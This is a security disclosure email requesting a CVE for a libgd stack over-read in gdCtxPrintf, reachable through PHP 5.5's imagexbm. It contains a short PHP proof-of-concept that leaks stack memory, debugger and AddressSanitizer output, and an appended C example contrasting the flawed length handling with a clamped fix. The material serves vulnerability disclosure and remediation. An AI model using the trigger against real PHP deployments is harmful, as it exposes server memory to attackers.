Date: Sun, 29 May 2016 12:43:34 -0500
From: Fernando Muñoz <>
Subject: CVE Request: libgd - gdCtxPrintf memory leak

libgd report:

PHP report: - password 18c90f75


Credit: Fernando Muñoz and Marcelo Echeverria

While creating an XBM image (imagexbm) with a user-supplied name,
libgd isn't checking the vsnprintf return value, and PHP 5.5 will trust
this length and read more memory than it should, causing an out-of-bounds
read that leaks stack memory.

vsnprintf man: "a return value of size or more means that the output
was truncated".

PHP devs marked it as "not a bug" because the version of libgd bundled
with PHP 5.5 is not vulnerable; however, using PHP with the systemwide
libgd is a common practice. PHP 5.6 and PHP 7 are not vulnerable to this
issue because another bugfix prevents this from being exploited [1].

Test script (PHP 5.5 and systemwide libgd):
<?php
$var1 = imagecreatetruecolor(2, 2);   // tiny 2x2 image; only the name matters
$var2 = str_repeat("ABCD", 1030);     // 4120-byte name, longer than gdCtxPrintf's 4096-byte buffer
imagexbm($var1, $var2, 0);            // the name is formatted into every XBM header line

Affected code:
/* {{{ gdCtxPrintf */
static void gdCtxPrintf(gdIOCtx * out, const char *format, ...)
{
    char buf[4096];
    int len;
    va_list args;

    va_start(args, format);
    len = vsnprintf(buf, sizeof(buf)-1, format, args);
    va_end(args);
     // -----> if len >= sizeof(buf)-1 (4095) the output was truncated
     // -----> but libgd passes this value on as is, so putBuf reads
     // -----> len bytes out of a 4096-byte stack buffer
    out->putBuf(out, buf, len);
}
/* }}} */

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user/php/php-55/sapi/cli/php -n
-dextension=/home/user/php/php-55/modules/ /home/user/img.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/".

Breakpoint 1, _php_image_output_putbuf (ctx=0xb46ddf38,
buf=0xbfffa69c, l=8017) at /home/user/php/php-55/ext/gd/gd_ctx.c:39
39              return php_write((void *)buf, l TSRMLS_CC);
(gdb) print l
$7 = 8017

PHP will use 8017 as the string length.

#define ABCD... <random stuff from memory> ...
ERROR: AddressSanitizer: stack-buffer-underflow on address
0xbfffb750 at pc 0xb7aa6dbd bp 0xbfffa408 sp 0xbfff9fdc
READ of size 8017 at 0xbfffb750 thread T0
    #0 0xb7aa6dbc
    #1 0x99388cf in sapi_cli_single_write
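The following is an added example, not code from the post or from libgd: it
reproduces the affected gdCtxPrintf pattern next to a clamped version and
measures, without actually reading out of bounds, how far past the 4096-byte
stack buffer a putBuf that trusts the vsnprintf return value would read. The
sink_t type, the helper names, and the "#define %s_width %d" format string
(assumed to mirror the first header line libgd writes for an XBM) are
assumptions made for this example; the 4120-byte "ABCD" name is the one from
the test script above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GD_BUF_SIZE 4096   /* matches char buf[4096] in libgd's gdCtxPrintf */

/* Stand-in for gdIOCtx (assumption for this example): instead of writing,
 * it records the byte count the printf helper claims is valid in its
 * stack buffer. A real putBuf (e.g. PHP's _php_image_output_putbuf)
 * would read exactly that many bytes. */
typedef struct {
    size_t claimed;
} sink_t;

/* Same shape as the affected gdCtxPrintf: the vsnprintf return value is
 * forwarded unchecked. For output longer than sizeof(buf)-1 it is the
 * untruncated length, not the number of bytes stored in buf. */
static void ctx_printf_unsafe(sink_t *out, const char *format, ...)
{
    char buf[GD_BUF_SIZE];
    int len;
    va_list args;

    va_start(args, format);
    len = vsnprintf(buf, sizeof(buf) - 1, format, args);
    va_end(args);
    out->claimed = (size_t)len;   /* BUG: may exceed sizeof(buf) - 1 */
}

/* Hardened form: clamp to what vsnprintf actually stored and treat a
 * negative return (encoding error) as nothing written. */
static void ctx_printf_safe(sink_t *out, const char *format, ...)
{
    char buf[GD_BUF_SIZE];
    int len;
    va_list args;

    va_start(args, format);
    len = vsnprintf(buf, sizeof(buf) - 1, format, args);
    va_end(args);
    if (len < 0)
        len = 0;
    else if ((size_t)len > sizeof(buf) - 1)
        len = (int)(sizeof(buf) - 1);   /* output was truncated */
    out->claimed = (size_t)len;
}

/* The name from the test script: "ABCD" repeated `times` times.
 * Returns a heap string the caller frees (NULL on allocation failure). */
char *repeat_abcd(size_t times)
{
    char *s = malloc(times * 4 + 1);
    if (s == NULL)
        return NULL;
    for (size_t i = 0; i < times; i++)
        memcpy(s + i * 4, "ABCD", 4);
    s[times * 4] = '\0';
    return s;
}

/* Format the first XBM header line for `name` through one of the two
 * helpers and return the length handed to the sink. */
size_t xbm_width_line_len(const char *name, int width, int hardened)
{
    sink_t sink = { 0 };

    if (hardened)
        ctx_printf_safe(&sink, "#define %s_width %d\n", name, width);
    else
        ctx_printf_unsafe(&sink, "#define %s_width %d\n", name, width);
    return sink.claimed;
}

/* Bytes a putBuf honouring `claimed` would read past the end of the
 * 4096-byte stack buffer; zero means the length is in bounds. */
size_t overread_bytes(size_t claimed)
{
    return claimed > GD_BUF_SIZE ? claimed - GD_BUF_SIZE : 0;
}

int main(void)
{
    char *name = repeat_abcd(1030);   /* 4120 bytes, as in the PHP script */
    if (name == NULL)
        return 1;
    size_t unsafe_len = xbm_width_line_len(name, 2, 0);
    size_t safe_len = xbm_width_line_len(name, 2, 1);
    printf("unchecked length: %zu (%zu bytes past the buffer)\n",
           unsafe_len, overread_bytes(unsafe_len));
    printf("clamped length:   %zu (%zu bytes past the buffer)\n",
           safe_len, overread_bytes(safe_len));
    free(name);
    return 0;
}
```

With the 4120-byte name the unchecked helper hands the sink 4137 bytes
(8 for "#define ", 4120 for the name, 7 for "_width ", the digit and the
newline), 41 more than the buffer holds, while the clamped helper hands it
4095. The clamp is the whole fix: vsnprintf reports the length the output
would have had, so the caller must take the minimum of that and the buffer
size it passed in, and handle a negative return separately.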

